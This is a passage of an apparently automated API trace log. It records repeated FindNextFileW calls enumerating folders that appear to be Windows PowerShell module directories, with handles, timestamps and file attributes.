ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="International", cAlternateFileName="INTERN~1")) returned 1 [0224.473] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI", cAlternateFileName="")) returned 1 [0224.473] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0224.473] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds", cAlternateFileName="")) returned 1 [0224.473] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0224.473] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0224.474] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="MICROS~1.HOS")) returned 1 [0224.474] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="MICROS~1.MAN")) returned 1 [0224.474] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="MICROS~1.ODA")) returned 1 [0224.474] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="MICROS~1.SEC")) returned 1 [0224.474] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="MICROS~1.UTI")) returned 1 [0224.474] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="MICROS~2.MAN")) returned 1 [0224.475] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent", cAlternateFileName="")) returned 1 [0224.475] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc", cAlternateFileName="")) returned 1 [0224.475] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter", cAlternateFileName="NETADA~1")) returned 1 [0224.475] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection", cAlternateFileName="NETCON~1")) returned 1 [0224.475] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture", cAlternateFileName="NETEVE~1")) returned 1 [0224.476] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo", cAlternateFileName="")) returned 1 [0224.476] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat", cAlternateFileName="")) returned 1 [0224.477] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos", cAlternateFileName="")) returned 1 [0224.477] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity", cAlternateFileName="NETSEC~1")) returned 1 [0224.477] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam", cAlternateFileName="NETSWI~1")) returned 1 [0224.477] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP", cAlternateFileName="")) returned 1 [0224.477] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus", cAlternateFileName="NETWOR~1")) returned 1 [0224.477] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager", cAlternateFileName="NETWOR~2")) returned 1 [0224.478] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13948a6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13948a6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkTransition", cAlternateFileName="NETWOR~3")) returned 1 [0224.478] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PcsvDevice", cAlternateFileName="PCSVDE~1")) returned 1 [0224.478] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKI", cAlternateFileName="")) returned 1 [0224.478] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PnpDevice", cAlternateFileName="PNPDEV~1")) returned 1 [0224.478] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6350b6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6350b6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintManagement", cAlternateFileName="PRINTM~1")) returned 1 [0224.479] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="PSDESI~1")) returned 1 [0224.479] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="PSDIAG~1")) returned 1 [0224.479] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", cAlternateFileName="PSSCHE~1")) returned 1 [0224.479] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflow", cAlternateFileName="PSWORK~1")) returned 1 [0224.479] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflowUtility", cAlternateFileName="PSWORK~2")) returned 1 [0224.480] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa719ec9, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa719ec9, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ScheduledTasks", cAlternateFileName="SCHEDU~1")) returned 1 [0224.480] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecureBoot", cAlternateFileName="SECURE~1")) returned 1 [0224.480] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare", cAlternateFileName="")) returned 1 [0224.480] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness", cAlternateFileName="SMBWIT~1")) returned 1 [0224.480] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout", cAlternateFileName="STARTL~1")) returned 1 [0224.480] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage", cAlternateFileName="")) returned 1 [0224.481] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TLS", cAlternateFileName="")) returned 1 [0224.481] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0224.481] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TrustedPlatformModule", cAlternateFileName="TRUSTE~1")) returned 1 [0224.481] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VpnClient", cAlternateFileName="VPNCLI~1")) returned 1 [0224.481] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wdac", cAlternateFileName="")) returned 1 [0224.481] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 